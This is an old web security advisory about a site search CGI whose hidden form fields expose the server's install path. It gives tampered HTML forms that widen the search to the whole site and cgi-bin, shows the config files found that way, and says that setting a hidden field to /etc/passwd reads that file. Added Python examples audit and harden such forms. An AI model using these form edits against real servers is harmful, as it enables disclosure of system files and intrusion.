Leaking information about the server through hidden fields in HTML code
[2003/10/08, durito]
In the HTML source of the index page of the www.xxx.com server there is the following fragment (unnecessary design elements removed):
<form method=POST action=../../cgi-bin/wsmsearch2.cgi>
Search Site: <input type=text name=terms size=20>
<input type=hidden name=boolean value=AND>
<input type=hidden name=case value=Insensitive>
<input type=hidden name=quicksearch value=NO>
<input type=hidden name=max value=50>
<input type=hidden name=faqfile value="/opt2/xxx/httpd/htdocs _ http://www.xxx.com/ _ *.* manual/ updates/ _ http://www.xxx.com">
<input type=hidden name=resultspage value=/opt2/xxx/httpd/htdocs/results.html>
<input type=submit value=Search!>
As has become clear, this is the site's search script. But these lines are especially interesting:
<input type=hidden name=faqfile value="/opt2/xxx/httpd/htdocs _ http://www.xxx.com/ _ *.* manual/ updates/ _ http://www.xxx.com">
<input type=hidden name=resultspage value=/opt2/xxx/httpd/htdocs/results.html>
/opt2/xxx/httpd/htdocs
- this is the installation path of the site, but that is not all. The search script takes its data from the hidden form fields:
<input type=hidden name=boolean value=AND>
<input type=hidden name=case value=Insensitive>
<input type=hidden name=quicksearch value=NO>
<input type=hidden name=max value=50>
<input type=hidden name=faqfile value="/opt2/xxx/httpd/htdocs _ http://www.xxx.com/ _ *.* manual/ updates/ _ http://www.xxx.com">
<input type=hidden name=resultspage value=/opt2/xxx/httpd/htdocs/results.html>
that is, the search is carried out in the folders:
manual/ updates/
and in the server root folder http://www.xxx.com/ _ *.*
(interestingly, the search script found the file
www_xxx_user_list.txt
in the server root; it is a list of users). So here it is possible to manipulate the script's query. Create an HTML file with this code:
<form method=POST action=../../../www.xxx.com/cgi-bin/wsmsearch2.cgi>
Search Site: <input type=text name=terms size=20>
<input type=hidden name=boolean value=AND>
<input type=hidden name=case value=Insensitive>
<input type=hidden name=quicksearch value=NO>
<input type=hidden name=max value=50>
<input type=hidden name=faqfile value=/opt2/xxx/httpd/htdocs>
<input type=hidden name=resultspage value=/opt2/xxx/httpd/htdocs/results.html>
<input type=submit value=Search!>
that is, just remove the string:
_ http://www.xxx.com/ _ *.* manual/ updates/ _ http://www.xxx.com
and perform a search query on the entire site. You can also search for files in
/opt2/xxx/httpd/htdocs/cgi-bin/
:
<form method=POST action=../../../www.xxx.com/cgi-bin/wsmsearch2.cgi>
Search Site: <input type=text name=terms size=20>
<input type=hidden name=boolean value=AND>
<input type=hidden name=case value=Insensitive>
<input type=hidden name=quicksearch value=NO>
<input type=hidden name=max value=50>
<input type=hidden name=faqfile value="/opt2/xxx/httpd/htdocs _ http://www.xxx.com/ _ *.* cgi-bin/ _ http://www.xxx.com">
<input type=hidden name=resultspage value=/opt2/xxx/httpd/htdocs/results.html>
<input type=submit value=Search!>
As a result of these requests, the following was found:
Here are your search results for the keyword(s) conf.dont_use in order of relevance.
1) conf.dont_use/srm.conf.old SIZE: 7354 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0
2) conf.dont_use/srm.conf SIZE: 7436 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0
3) conf.dont_use/sessiond.conf SIZE: 159 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0
4) conf.dont_use/mime.types SIZE: 2652 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0
5) conf.dont_use/imagemap.conf SIZE: 1062 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0
6) conf.dont_use/httpsd.conf.dave SIZE: 43652 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0
7) conf.dont_use/httpsd.conf.11-20-2001 SIZE: 43841 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0
8) conf.dont_use/httpsd.conf-backup SIZE: 13243 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0
9) conf.dont_use/httpsd.conf SIZE: 43927 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0
10) conf.dont_use/httpd.conf.vhback SIZE: 7225 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0
11) conf.dont_use/httpd.conf.11-20-2001 SIZE: 7451 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0
12) conf.dont_use/httpd.conf SIZE: 7451 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0
13) conf.dont_use/access.conf SIZE: 1725 bytes TYPE: Unknown Term: conf.dont_use Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0
and another script:
Here are your search results for the keyword(s) securedata in order of relevance.
1) cgi-bin/conf.dont_use/resetsecuredata.cgi SIZE: bytes TYPE: CGIssript Term: securedata Filename matches: 0,1 Title matches: 0,0 exact matches: 0 partial matches: 0
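The hidden fields quoted above hand the server's filesystem layout to every visitor. The following audit is an added example, not part of the original article: it flags hidden inputs whose value embeds a Unix absolute path, with a sample form reconstructed from the one in the article (the function and class names are illustrative).

```python
import re
from html.parser import HTMLParser

# Heuristic: a Unix absolute path containing at least two slashes, at the start
# of the value or after whitespace, so URLs such as http://host/ do not match.
PATH_RE = re.compile(r"(?:^|\s)(/(?:[\w.\-]+/)+[\w.\-]*)")

# Reconstructed from the form quoted in the article (host and paths as given there).
SAMPLE = """
<form method="POST" action="../../cgi-bin/wsmsearch2.cgi">
<input type="text" name="terms" size="20">
<input type="hidden" name="boolean" value="AND">
<input type="hidden" name="max" value="50">
<input type="hidden" name="faqfile" value="/opt2/xxx/httpd/htdocs _ http://www.xxx.com/ _ *.* manual/ updates/ _ http://www.xxx.com">
<input type="hidden" name="resultspage" value="/opt2/xxx/httpd/htdocs/results.html">
<input type="submit" value="Search!">
</form>
"""


class HiddenFieldAudit(HTMLParser):
    """Collect (field name, path) pairs for hidden inputs that embed a path."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        if a.get("type", "").lower() != "hidden":
            return
        for m in PATH_RE.finditer(a.get("value", "")):
            self.findings.append((a.get("name", ""), m.group(1)))


def audit(html):
    """Return the findings for one HTML document given as a string."""
    parser = HiddenFieldAudit()
    parser.feed(html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for name, path in audit(SAMPLE):
        print(f"hidden field {name!r} exposes server path {path}")
```

Site-relative URL paths such as /cgi-bin/search also match this heuristic, so each finding needs a quick manual look.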
The well-loved /etc/passwd is obtained quite simply: the value of the hidden field resultspage is simply replaced by /etc/passwd. This is how server administrators sometimes try to patch up all sorts of holes by applying the latest patches, while the information leaks from the HTML code.
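Both manipulations described above work because the script takes filesystem paths (faqfile, resultspage) from the request. The following server-side handling is an added example, not code from the article or from the search script: the client may only name a scope key, and every path comes from server configuration (the document root, the scope names and the `scope` field are assumptions made for illustration).

```python
from pathlib import PurePosixPath

# Assumed layout for illustration; none of these values come from the article.
DOCROOT = PurePosixPath("/srv/www/htdocs")
SCOPES = {                      # scope key -> directory, defined only on the server
    "manual": DOCROOT / "manual",
    "updates": DOCROOT / "updates",
}
RESULTS_TEMPLATE = DOCROOT / "results.html"   # fixed; never taken from the request
MAX_RESULTS = 50
PATH_FIELDS = ("faqfile", "resultspage")      # fields the old form used for paths


class RejectedRequest(ValueError):
    """Raised for requests that try to steer the script to a path or unknown scope."""


def build_search_plan(form):
    """Turn posted fields (a dict of str) into a plan built from server-side values."""
    for field in PATH_FIELDS:
        if field in form:
            # The hardened form never sends these, so their presence means tampering.
            raise RejectedRequest(f"unexpected field: {field}")
    keys = [k for k in form.get("scope", "manual,updates").split(",") if k]
    unknown = [k for k in keys if k not in SCOPES]
    if not keys or unknown:
        raise RejectedRequest(f"missing or unknown scope: {unknown}")
    terms = form.get("terms", "").strip()
    if not terms or len(terms) > 100:
        raise RejectedRequest("terms missing or too long")
    try:
        limit = int(form.get("max", MAX_RESULTS))
    except ValueError:
        raise RejectedRequest("max is not a number") from None
    return {
        "terms": terms,
        "dirs": [str(SCOPES[k]) for k in keys],
        "template": str(RESULTS_TEMPLATE),
        "limit": max(1, min(limit, MAX_RESULTS)),   # the client cannot raise the cap
    }
```

Logging each rejected request gives the operator a signal that someone is editing the form.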
your bug Durito
_________________
EAT THE RICH!
Copyright 2002-2003 by void.ru All rights reserved.